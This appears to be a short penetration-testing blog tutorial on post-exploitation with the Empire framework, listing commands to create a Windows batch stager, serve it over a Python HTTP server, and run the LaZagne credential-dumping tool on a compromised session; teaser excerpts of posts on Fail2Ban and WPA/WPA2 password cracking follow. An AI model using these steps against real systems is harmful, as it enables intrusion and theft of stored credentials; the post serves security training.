Post Exploitation With Empire And LaZagne

Post Exploitation with Empire & LaZagne

Tools used:



Setting up the listener


Setting up the stager

  • Back
  • Usestager windows/launcher_bat
  • Set Listener http
  • Set OutFile¬† /specify directory/launcher.bat
  • execute
  • Python -m SimpleHTTPServer 8080 (Start server in directory)

Interacting with the session/target

  • Interact <session name>
  • Sysinfo
  • help
  • shell C:\Users\Alexis\Downloads\lazagne.exe -h



Liked it? Take a second to support Alexis on Patreon!
Share this post

Leave a Reply

Your email address will not be published. Required fields are marked *


SSH Brute-force Protection With Fail2Ban

Fail2Ban is an intrusion prevention framework written in Python that protects Linux systems and servers from brute-force attacks. We can setup Fail2Ban to provide brute-force protection for SSH on our server, this will ensure that the server is secure from brute-force attacks and it also allows us to monitor the strength of the brute-force attacks […]

Share this post

Cracking WPA/WPA2 Passwords

Cracking WPA/WPA2 Passwords This test was carried out using the Alpha Long Range USB Adapter (AWUS036NHA) In this article, I will explain how to crack WPA/WPA2 passwords by capturing handshakes, then using a word list, to crack the password protected the access point. This is known as a dictionary attack. In this example, I will […]

Share this post